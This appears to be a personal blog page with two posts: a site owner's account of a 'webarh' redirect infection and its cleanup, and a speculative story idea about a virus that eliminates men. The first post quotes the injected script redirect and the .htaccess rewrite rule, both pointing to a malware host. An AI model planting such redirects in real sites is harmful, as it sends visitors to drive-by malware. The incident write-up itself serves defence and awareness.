Webarh? More like Web Aargh!

Earlier this weekend I got a Facebook message from a friend saying that my website was redirecting to a malware site. Thankfully I was near a computer and had a look at it, every page view was redirecting to a site that installed malware on your computer. Thankfully most browsers recognise this fact and present you with a warning page.

I did some hunting and it turns out I had been infected with webarh redirect virus (Also reffered to as funnysignage as it uses the same mode of attack), this virus has added the following  line to any index.php files it found:

<script>

document.location.href=’http://webarh.com/07628e5249a8b3459e49860dc9045837′;

</script>

Note the numbers at the end are just a random identifier, probably so that they can tell where it originated.

And it had also gone through pretty much every directory either replacing or adding a .htaccess file with the following content:

RewriteEngine On
RewriteBase /
RewriteRule ^(.*)? http://webarh.com/07628e5249a8b3459e49860dc9045837

For the non tech savvy the first bit tells your web browser to redirect to (Don’t go to that link, bad things will happen):

“http://webarh.com/07628e5249a8b3459e49860dc9045837”

The other tells my web server to send all requests for ANY PAGES to that same URL. It’s a two pronged attack, if you have script blocking software on your browser the .htaccess file makes the server send you to the malware site, if your server ignores the .htaccess file, then there is a chance that the script will be work. Eitherway when you end up at that URL no doubt the website tries to exploit whatever vulnerabilities exist in your browser to install bad software on your computer.

I diligently deleted all the .htaccess files and removed the script line from every file I could find it in. I did a grep for webarh.com over the entire website, and removed any references to it I could find, I even changed the ftp password on my site because I read that sometimes that’s how webarh infects your server. It looked like all was good for about 18 hours my site was back up and running and everything was hunky dory. At about midnight last night I got a text from someone else telling me  my site was broken again. I check and sure enough it was redirecting again, but only partially, some of the other domains I host in subdirectories of my web space were okay.

I’d heard that the webarh/funnysignage redirect sometimes puts back doors into your site, I didn’t have the time to look through every php file on my server which hosts 4 wordpress installs and a phpbb install so I took a deep breath and deleted everything… Most of my content was in the database, the only content that wordpress stores on disk is images and stuff you have uploaded. Of course I took a backup of the site beforehand just in case.

I’ve so far restored two of my wordpress blogs, and everything seems okay, I deleted an old version of phpMyAdmin I had lying about from before my service provider gave me direct access to the database. I’ve not deleted the phpBB install yet as that didn’t seem to be infected aside from the fact that the .htaccess file was causing everything to redirect to the malware site. So the next step would be to remove that too.

Fingers crossed it’s all looking good, if it happens again then I’m going to be a little more worried, either:

  • There is a backdoor in the SQL somewhere, then I’m really screwed.
  • There is a backdoor in phpBB, in which case I’ll have to reinstall that.
  • There is a virus on my computer which is picking up the the FTP password and using it to wreak havoc on my website…

I’m hoping that None of the above apply… And that I’ll be safe from here on out, I think that the root cause of this was the fact that one of my sites didn’t have the latest version of WordPress installed on it, my reasoning behind this is that WordPress recently released a security update that allowed code to be executed etc… I’d updated my main site but had forgotten to update the others.

I’d appreciate anyone who notices any issues on my website getting in touch with me to tell me so.

Story Idea: The X Virus/The myth of man.

Inspired by this comic strip I started to think what would happen to society if a virus were to spread through humanity which broke our Y chromosomes? Within 3 generations there would be no men. We would probably figure out some way of reproduction in fact we have the technology now.
Two or three hundred/thousand years down line the existence of “Man” would be a myth. Everyone on the planet would be a lesbian because thats the natural way of things. It reminds me a bit of the plot of Vandread except without the whole space war thing.
What would happen if suddenly a man reappeared? Either a baby boy was born (In a reverse Children of Men type plot) or an unknown indiginous tribe being discovered in some remote area?
How would this upset the staus quo? Would people see this as the way of old, a novelty? would hetero sexualism be seen in the same light as homosexualism is/was? Could it be seen as an abomonation?
Would specimens of men be kept in zoo’s and marveled at?
“Look at the odd arrangement of facial/body hair, they look like monkeys.”
Assuming that the virus hadn’t affected other animals, would humanity over time have rationalized their sexlessness as a sign that they were higher beings than animals?
“Animals have sex as humans we don’t need that. It’s bestial”
In a stereo typical science fiction univese a woman would start to have feelings for a man and nature would kick in, however is that what would happen?
My guess is that the majority of woman kind would be so disgusted with the thought that chances are that man would die unfulfilled? it does beg the question, are we programmed to know what sex is? I know other animals are, because they don’t communicate. Birds and bees don’t have to have a conversation about the birds and the bees, they just get on with it.
Is sex a genetic memory? If so can we “forget” that genetic memory?

This comic also from the same site might be considdered relevant…